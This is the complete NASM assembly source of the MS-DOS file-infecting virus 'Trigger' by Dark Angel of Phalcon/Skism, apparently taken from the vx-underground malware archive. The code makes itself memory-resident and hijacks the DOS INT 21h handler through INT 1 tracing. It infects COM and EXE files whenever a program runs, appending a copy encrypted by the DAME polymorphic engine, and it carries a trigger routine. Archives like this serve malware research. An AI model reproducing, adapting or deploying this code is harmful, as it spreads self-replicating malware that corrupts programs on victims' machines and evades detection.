MalwareSourceCode/MSDOS/T-Index/Virus.MSDOS.Unknown.trigger.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

501 lines
9.8 KiB
NASM

.model tiny
.code
.radix 16
org 0
viruslength = (heap - entry)
virussizeK = (endvirus - entry + 3ff) / 400
virussizepara = (virussizeK)*40
EXE_ID = 'PS'
entry:
call past
next:
db 0,"Trigger by Dark Angel of Phalcon/Skism",0Dh,0A
db "Utilising Dark Angel's Multiple Encryptor (DAME)",0Dh,0A
db 0Dh,0A,0
checkstub db 72,0FA,0E,1F,0BA,00,0B8,0B8,40,00,8E,0C0,26,81,3E,63
past: cld
pop bp
mov ax,0cf0
mov bx,'DA'
int 21
cmp bx,'GH'
jnz no_trigger
trigger:
push ds
push es
push cs
pop ds
xor ax,ax
checkagain:
lea si,[bp+checkstub-next]
mov es,ax
xor di,di
mov cx,8
rep cmpsw
jz trigger_it
inc ax
cmp ax,0a000
jb checkagain
jmp exit_trigger
trigger_it:
mov [bp+patch-next],ax
mov ds,ax
mov byte ptr ds:73,0cbh
push bp
mov bp,-80
jmp short $+2
db 09a ; call far ptr
dw 1
patch dw ?
pop bp
mov byte ptr ds:73,1f
exit_trigger:
pop es
pop ds
jmp short restore
no_trigger:
mov ax,4b90
int 21
cmp ax,bx
jz restore
push ds
push es
mov ax,ds
dec ax
mov ds,ax
sub word ptr ds:3,virussizepara
sub word ptr ds:12,virussizepara
mov es,ds:12
push cs
pop ds
xor di,di
lea si,[bp+offset entry-offset next]
mov cx,(viruslength + 1)/2
rep movsw
xor ax,ax
mov ds,ax
sub word ptr ds:413,virussizeK
mov di,offset oldint21
mov si,21*4
movsw
movsw
cli
pushf
pushf
pop ax
or ah,1
push ax
mov ds:1*4+2,es
mov word ptr ds:1*4,offset int1_1
popf
mov ah,30
pushf
call dword ptr ds:21*4
popf
lds si,dword ptr es:oldint21
mov di,si
lodsw
mov word ptr es:int21patch1,ax
lodsw
mov word ptr es:int21patch2,ax
lodsb
mov byte ptr es:int21patch3,al
push ds ; es:di->int 21 handler
push es
pop ds ; ds->high segment
pop es
mov al,0ea
stosb
mov ax,offset int21
stosw
mov ax,ds
stosw
sti
pop es
pop ds
restore:
cmp sp,-2
jnz restoreEXE
restoreCOM:
lea si,[bp+readbuffer-next]
mov di,100
push di
movsw
movsw
ret
restoreEXE:
mov ax,ds
add ax,10
add cs:[bp+readbuffer+16-next], ax
add ax,cs:[bp+readbuffer+0e-next]
mov ss,ax
mov sp,cs:[bp+readbuffer+10-next]
jmp dword ptr cs:[bp+readbuffer+14-next]
readbuffer dw 20cdh
dw 0bh dup (?)
int1_1:
push bp
mov bp,sp
push ax
mov ax, [bp+4] ; get segment
cmp ax, cs:oldint21+2
jae exitint1
mov cs:oldint21+2,ax
mov ax, [bp+2]
mov cs:oldint21,ax
exitint1:
pop ax
pop bp
iret
int1_2:
push bp
mov bp,sp
push ax
mov ax,cs
cmp ax,[bp+4]
jz exitint1
mov ax,[bp+4]
cmp ax,cs:oldint21+2
jnz int1_2_restore
mov ax,[bp+2]
cmp ax,cs:oldint21
jb int1_2_restore
sub ax,5
cmp ax,cs:oldint21
jbe exitint1
int1_2_restore:
push es
push di
cld
les di,dword ptr cs:oldint21
mov al,0ea
stosb
mov ax,offset int21
stosw
mov ax,cs
stosw
pop di
pop es
and [bp+6],0feff
jmp exitint1
install:
mov bx,ax
iret
int21:
cmp ax,4b90
jz install
push ds
push di
lds di,dword ptr cs:oldint21
mov word ptr ds:[di],1234
int21patch1 = $ - 2
mov word ptr ds:[di+2],1234
int21patch2 = $ - 2
mov byte ptr ds:[di+4],12
int21patch3 = $ - 1
pop di
pop ds
cld
cmp ax,4b00
jz infect
exitint21:
push ds
push ax
xor ax,ax
mov ds,ax
cli
mov word ptr ds:1*4,offset int1_2
mov ds:1*4+2,cs
sti
pushf
pop ax
or ah,1
push ax
popf
pop ax
pop ds
db 0ea
oldint21 dw 0, 0
callint21:
pushf
call dword ptr cs:oldint21
ret
already_infected:
pop dx
pop cx
mov ax,5701
call callint21
mov ah,3e
call callint21
exitnoclose:
mov ax,4301
pop dx
pop ds
pop cx
call callint21
exitinfect:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
jmp exitint21
infect:
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
mov ax,4300
call callint21
push cx
push ds
push dx
mov ax,4301
xor cx,cx
call callint21
mov ax,3d02
call callint21
jc exitnoclose
xchg ax,bx
mov ax,5700
int 21
push cx
push dx
mov ah,3f
mov cx,18
push cs
pop ds
push cs
pop es
mov dx,offset readbuffer
mov si,dx
call callint21
jc already_infected
mov di,offset writebuffer
mov cx,18/2
push si
push di
rep movsw
pop di
pop si
mov ax,4202
xor cx,cx
cwd
int 21
cmp word ptr [di],'ZM'
jnz infectCOM
infectEXE:
cmp readbuffer+10,EXE_ID
go_already_infected:
jz already_infected
mov ds:writebuffer+4,ax
mov ds:writebuffer+2,dx
mov cx,10
div cx
sub ax,ds:writebuffer+8
mov ds:writebuffer+14,dx
mov ds:writebuffer+16,ax
xchg cx,dx
mov ds:writebuffer+0e,ax
mov ds:writebuffer+10,EXE_ID
mov al,10b
jmp finishinfect
infectCOM: ; si = readbuffer, di = writebuffer
push ax
mov cx,4
xor dx,dx
check_infection_loop:
lodsb
add dl,al
loop check_infection_loop
pop ax
or dl,dl
jz go_already_infected
mov dx,18
cmp ax,dx
jnb no_fixup_com
mov ax,4200
xor cx,cx
int 21
no_fixup_com:
mov cx,ax
inc ch ; add cx,100
sub ax,3
push ax
mov al,0e9
stosb
pop ax
stosw
add al,ah
add al,0e9
neg al
stosb
mov al,11b
finishinfect:
cbw
; ax = bitmask
; bx = start decrypt in carrier file
; cx = encrypt length
; dx = start encrypt in virus
; si = buffer to put decryption routine
; di = buffer to put encryption routine
push bx
xchg cx,bx
xor si,si
mov di,offset copyvirus
mov cx,(heap-entry+1)/2
rep movsw
push ax
call rnd_init_seed
pop ax
mov dx,offset copyvirus
mov cx,viruslength
mov si,offset _decryptbuffer
mov di,offset _encryptbuffer
call dame
push cx
cmp ds:writebuffer,'ZM'
jnz no_fix_header
mov dx,ds:writebuffer+2
mov ax,ds:writebuffer+4
add cx,viruslength
add ax,cx
adc dx,0
mov cx,200
div cx
or dx,dx
jz nohiccup
inc ax
nohiccup:
mov ds:writebuffer+4,ax
mov ds:writebuffer+2,dx
no_fix_header:
call di
pop cx
pop bx
mov ah,40
mov dx,offset _decryptbuffer
call callint21
mov ah,40
mov cx,viruslength
mov dx,offset copyvirus
call callint21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov cx,18
mov dx,offset writebuffer
call callint21
jmp already_infected
vars = 0
include dame.asm
heap:
vars = 1
include dame.asm
writebuffer dw 0c dup (?)
_encryptbuffer: db 80 dup (?)
_decryptbuffer: db 180 dup (?)
copyvirus db viruslength dup (?)
db 20 dup (?)
endvirus:
end entry